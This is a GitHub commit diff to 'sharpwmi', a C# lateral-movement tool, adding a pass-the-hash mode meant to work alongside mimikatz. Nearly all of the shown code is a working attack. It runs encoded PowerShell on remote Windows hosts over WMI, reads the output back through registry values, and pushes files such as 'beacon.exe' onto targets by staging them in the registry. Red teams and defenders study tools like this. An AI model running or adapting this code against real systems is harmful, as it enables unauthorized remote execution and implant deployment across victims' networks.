支持与mimikatz的pth交互

QAX-A-Team · Aug 26, 2020 · 2ff1bf5 · 2ff1bf5
1 parent 7852c14
commit 2ff1bf5
Showing 1 changed file with 123 additions and 46 deletions.
diff --git a/sharpwmi/sharpwmi/Program.cs b/sharpwmi/sharpwmi/Program.cs
@@ -1,4 +1,4 @@
-using System;
+using System;
 using System.Text;
 using System.Threading;
 using System.IO;
@@ -35,85 +35,162 @@ public static string Base64Decode(string content)
             byte[] bytes = Convert.FromBase64String(content);
             return Encoding.Unicode.GetString(bytes);
         }
+
+
         public void run(string[] args)
         {
-            if (args.Length < 5)
+            if (args.Length < 3)
             {
-                Console.WriteLine("\n \t\tsharpwmi.exe 192.168.2.3 administrator 123 cmd whoami\n\t\tsharpwmi.exe 192.168.2.3 administrator 123 upload beacon.exe c:\\beacon.exe");
+                Console.WriteLine("\n\t\tsharpwmi.exe 192.168.2.3 administrator 123 cmd whoami\n\t\tsharpwmi.exe 192.168.2.3 administrator 123 upload beacon.exe c:\\beacon.exe\n\t\tsharpwmi.exe pth 192.168.2.3 cmd whoami\n\t\tsharpwmi.exe pth 192.168.2.3 upload beacon.exe c:\\beacon.exe");
                 return;
             }
 
-            ConnectionOptions options = new ConnectionOptions();
-            string host = args[0];
-            options.Username = args[1];
-            options.Password = args[2];
 
+            if (args[0] == "pth") {
 
-            int delay = 5000;
+                string host = args[1];
+                string func_name = args[2];
+                string command = "";
+                string local_file = "";
+                string remote_file = "";
 
+                if (func_name == "cmd")
+                {
+                     command=args[3];
+                }
+                else
+                {
+                    local_file = args[3];
+                    remote_file = args[4];
+                }
 
+                ConnectionOptions options = new ConnectionOptions();
 
-            this.scope = new ManagementScope("\\\\" + host + "\\root\\cimv2", options);
-            this.scope.Options.Impersonation = System.Management.ImpersonationLevel.Impersonate;
-            this.scope.Options.EnablePrivileges = true;
-            this.scope.Connect();
+                int delay = 5000;
+                this.scope = new ManagementScope("\\\\" + host + "\\root\\cimv2", options);
+                this.scope.Options.Impersonation = System.Management.ImpersonationLevel.Impersonate;
+                this.scope.Options.EnablePrivileges = true;
+                this.scope.Connect();
 
+                if (func_name == "cmd") {
+                    string powershell_command = "powershell -enc " + Base64Encode(command);
 
-            if (args[3] == "cmd")
-            {
-                string powershell_command = "powershell -enc " + Base64Encode(args[4]);
+                    string code = "$a=(" + powershell_command + ");$b=[Convert]::ToBase64String([System.Text.UnicodeEncoding]::Unicode.GetBytes($a));$reg = Get-WmiObject -List -Namespace root\\default | Where-Object {$_.Name -eq \"StdRegProv\"};$reg.SetStringValue(2147483650,\"\",\"txt\",$b)";
+
+                    ExecCmd("powershell -enc " + Base64Encode(code));
+                    Console.WriteLine("[+]Exec done!\n");
+                    Thread.Sleep(delay);
+
+                    //this.ExecCmd("whoami");
+                    // 读取注册表
+                    ManagementClass registry = new ManagementClass(this.scope, new ManagementPath("StdRegProv"), null);
+                    ManagementBaseObject inParams = registry.GetMethodParameters("GetStringValue");
+
+                    inParams["sSubKeyName"] = "";
+                    inParams["sValueName"] = "txt";
+                    ManagementBaseObject outParams = registry.InvokeMethod("GetStringValue", inParams, null);
+                    // (String)outParams["sValue"];
 
-                string code = "$a=(" + powershell_command + ");$b=[Convert]::ToBase64String([System.Text.UnicodeEncoding]::Unicode.GetBytes($a));$reg = Get-WmiObject -List -Namespace root\\default | Where-Object {$_.Name -eq \"StdRegProv\"};$reg.SetStringValue(2147483650,\"\",\"txt\",$b)";
+                    Console.WriteLine("[+]output -> \n\n" + Base64Decode(outParams["sValue"].ToString()));
+                }else if (func_name == "upload")
+                {
+                    byte[] str = File.ReadAllBytes(local_file);
 
 
-                ExecCmd("powershell -enc " + Base64Encode(code));
-                Console.WriteLine("[+]Exec done!\n");
-                Thread.Sleep(delay);
+                    ManagementClass registry = new ManagementClass(this.scope, new ManagementPath("StdRegProv"), null);
+                    ManagementBaseObject inParams = registry.GetMethodParameters("SetStringValue");
+                    inParams["hDefKey"] = 2147483650; //HKEY_LOCAL_MACHINE;
+                    inParams["sSubKeyName"] = @"";
+                    inParams["sValueName"] = "upload";
 
-                //this.ExecCmd("whoami");
-                // 读取注册表
-                ManagementClass registry = new ManagementClass(this.scope, new ManagementPath("StdRegProv"), null);
-                ManagementBaseObject inParams = registry.GetMethodParameters("GetStringValue");
+                    inParams["sValue"] = Convert.ToBase64String(str);
+                    ManagementBaseObject outParams = registry.InvokeMethod("SetStringValue", inParams, null);
 
-                inParams["sSubKeyName"] = "";
-                inParams["sValueName"] = "txt";
-                ManagementBaseObject outParams = registry.InvokeMethod("GetStringValue", inParams, null);
-                // (String)outParams["sValue"];
 
-                Console.WriteLine("[+]output -> \n\n" + Base64Decode(outParams["sValue"].ToString()));
+
+                    //通过注册表还原文件
+                    string pscode = string.Format("$wmi = [wmiclass]\"Root\\default:stdRegProv\";$data=($wmi.GetStringValue(2147483650,\"\",\"upload\")).sValue;$byteArray = [Convert]::FromBase64String($data);[io.file]::WriteAllBytes(\"{0:s}\",$byteArray);;", remote_file);
+                    string powershell_command = "powershell -enc " + Base64Encode(pscode);
+
+                    Thread.Sleep(delay);
+                    ExecCmd(powershell_command);
+                    Console.WriteLine("[+]Upload file done!");
+                    return;
+                }
+
             }
-            else if (args[3] == "upload")
+            else
             {
 
+                ConnectionOptions options = new ConnectionOptions();
+                string host = args[0];
+                options.Username = args[1];
+                options.Password = args[2];
 
 
-                //写注册表
-                byte[] str = File.ReadAllBytes(args[4]);
+                int delay = 5000;
+                this.scope = new ManagementScope("\\\\" + host + "\\root\\cimv2", options);
+                this.scope.Options.Impersonation = System.Management.ImpersonationLevel.Impersonate;
+                this.scope.Options.EnablePrivileges = true;
+                this.scope.Connect();
 
 
-                ManagementClass registry = new ManagementClass(this.scope, new ManagementPath("StdRegProv"), null);
-                ManagementBaseObject inParams = registry.GetMethodParameters("SetStringValue");
-                inParams["hDefKey"] = 2147483650; //HKEY_LOCAL_MACHINE;
-                inParams["sSubKeyName"] = @"";
-                inParams["sValueName"] = "upload";
+                if (args[3] == "cmd")
+                {
+                    string powershell_command = "powershell -enc " + Base64Encode(args[4]);
 
-                inParams["sValue"] = Convert.ToBase64String(str);
-                ManagementBaseObject outParams = registry.InvokeMethod("SetStringValue", inParams, null);
+                    string code = "$a=(" + powershell_command + ");$b=[Convert]::ToBase64String([System.Text.UnicodeEncoding]::Unicode.GetBytes($a));$reg = Get-WmiObject -List -Namespace root\\default | Where-Object {$_.Name -eq \"StdRegProv\"};$reg.SetStringValue(2147483650,\"\",\"txt\",$b)";
 
 
+                    ExecCmd("powershell -enc " + Base64Encode(code));
+                    Console.WriteLine("[+]Exec done!\n");
+                    Thread.Sleep(delay);
 
-                //通过注册表还原文件
-                string pscode = string.Format("$wmi = [wmiclass]\"Root\\default:stdRegProv\";$data=($wmi.GetStringValue(2147483650,\"\",\"upload\")).sValue;$byteArray = [Convert]::FromBase64String($data);[io.file]::WriteAllBytes(\"{0:s}\",$byteArray);;", args[5]);
-                string powershell_command = "powershell -enc " + Base64Encode(pscode);
+                    //this.ExecCmd("whoami");
+                    // 读取注册表
+                    ManagementClass registry = new ManagementClass(this.scope, new ManagementPath("StdRegProv"), null);
+                    ManagementBaseObject inParams = registry.GetMethodParameters("GetStringValue");
 
-                Thread.Sleep(delay);
-                ExecCmd(powershell_command);
-                Console.WriteLine("[+]Upload file done!");
-                return;
+                    inParams["sSubKeyName"] = "";
+                    inParams["sValueName"] = "txt";
+                    ManagementBaseObject outParams = registry.InvokeMethod("GetStringValue", inParams, null);
+                    // (String)outParams["sValue"];
 
-            }
+                    Console.WriteLine("[+]output -> \n\n" + Base64Decode(outParams["sValue"].ToString()));
+                }
+                else if (args[3] == "upload")
+                {
 
 
+
+                    //写注册表
+                    byte[] str = File.ReadAllBytes(args[4]);
+
+
+                    ManagementClass registry = new ManagementClass(this.scope, new ManagementPath("StdRegProv"), null);
+                    ManagementBaseObject inParams = registry.GetMethodParameters("SetStringValue");
+                    inParams["hDefKey"] = 2147483650; //HKEY_LOCAL_MACHINE;
+                    inParams["sSubKeyName"] = @"";
+                    inParams["sValueName"] = "upload";
+
+                    inParams["sValue"] = Convert.ToBase64String(str);
+                    ManagementBaseObject outParams = registry.InvokeMethod("SetStringValue", inParams, null);
+
+
+
+                    //通过注册表还原文件
+                    string pscode = string.Format("$wmi = [wmiclass]\"Root\\default:stdRegProv\";$data=($wmi.GetStringValue(2147483650,\"\",\"upload\")).sValue;$byteArray = [Convert]::FromBase64String($data);[io.file]::WriteAllBytes(\"{0:s}\",$byteArray);;", args[5]);
+                    string powershell_command = "powershell -enc " + Base64Encode(pscode);
+
+                    Thread.Sleep(delay);
+                    ExecCmd(powershell_command);
+                    Console.WriteLine("[+]Upload file done!");
+                    return;
+
+                }
+            }
+
+
         }
         static void Main(string[] args)
         {